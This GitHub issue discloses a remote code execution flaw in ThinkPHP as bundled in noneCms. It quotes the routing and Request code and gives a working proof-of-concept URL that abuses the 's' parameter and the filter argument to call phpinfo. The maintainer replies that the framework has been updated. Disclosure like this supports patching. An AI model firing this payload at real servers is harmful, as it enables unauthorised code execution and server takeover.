Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a code execution vulnerability that can getshell #21

Open
twosmi1e opened this issue Dec 11, 2018 · 2 comments
Open

There is a code execution vulnerability that can getshell #21

twosmi1e opened this issue Dec 11, 2018 · 2 comments
Labels

Comments

@twosmi1e
Copy link

thinkphp/library/think/App.php

public function routeCheck()
    {
        $path = $this->request->path();
        $depr = $this->config('app.pathinfo_depr');
 public function path()
    {
        if (is_null($this->path)) {
            $suffix   = $this->config->get('url_html_suffix');
            $pathinfo = $this->pathinfo();
            if (false === $suffix) {
                // 禁止伪静态访问
public function pathinfo()
    {
        if (is_null($this->pathinfo)) {
            if (isset($_GET[$this->config->get('var_pathinfo')])) {
                // 判断URL里面是否有兼容模式参数
                $_SERVER['PATH_INFO'] = $_GET[$this->config->get('var_pathinfo')];
                unset($_GET[$this->config->get('var_pathinfo')]);
            } elseif ($this->isCli()) {
                // CLI模式下 index.php module/controller/action/params/...
                $_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';
            }

In the process of processing the route, Config::get(‘var_pathinfo’) is used as the receiving process pathinfo, and this value is s by default.
then, it will form a calling process: index.php?s=index/\namespace\class/method
In \think\Request

public function __construct($options = [])
    {
        foreach ($options as $name => $item) {
            if (property_exists($this, $name)) {
                $this->$name = $item;
            }
        }

        $this->config = Container::get('config');

        if (is_null($this->filter)) {
            $this->filter = $this->config->get('default_filter');
        }

        // 保存 php://input
        $this->input = file_get_contents('php://input');
    }

we can use input method
POC:http://localhost:90/noneCms/public/?s=index/\think\Request/input&filter=phpinfo&data=1

@twosmi1e
Copy link
Author

image

@twosmi1e twosmi1e changed the title There is a vulnerability that can getshell There is a code execution vulnerability that can getshell Dec 11, 2018
@nangge
Copy link
Owner

nangge commented Dec 11, 2018

谢谢反馈!现已把核心框架更新至官方最新版,ThinkPHP官方已修复该bug

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants